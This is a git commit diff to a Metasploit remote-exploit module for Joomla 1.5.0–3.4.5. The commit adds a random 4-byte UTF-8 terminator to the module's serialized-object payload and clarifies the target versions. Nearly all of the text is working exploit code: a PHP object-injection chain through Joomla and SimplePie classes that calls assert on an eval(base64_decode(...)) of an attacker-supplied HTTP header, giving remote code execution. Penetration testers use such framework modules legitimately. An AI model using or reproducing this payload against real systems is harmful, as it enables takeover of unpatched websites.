add random terminator and clarify target
parent
08d0ffd709
commit
8c43ecbfaf
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Privileged' => false,
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [['Joomla < 3.4.6', {}]],
|
||||
'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],
|
||||
'DisclosureDate' => 'Dec 14 2015',
|
||||
'DefaultTarget' => 0)
|
||||
)
|
||||
|
@ -140,13 +140,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# gets a random 4 byte UTF-8 character
|
||||
def get_terminator
|
||||
# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF
|
||||
[rand(0x10000..0x10ffff)].pack('U*')
|
||||
end
|
||||
|
||||
def get_payload(header_name)
|
||||
pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
|
||||
middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||
pre_pay = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
|
||||
pay = "eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;"
|
||||
middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
|
||||
post = "\xF0\x9D\x8C\x86"
|
||||
return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
|
||||
post_pay = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
|
||||
t1000 = get_terminator
|
||||
return "#{pre}#{pre_pay}s:#{pay.length}:\"#{pay}#{post_pay}#{t1000}"
|
||||
end
|
||||
|
||||
def print_status(msg='')
|
||||
|
|
Loading…
Reference in New Issue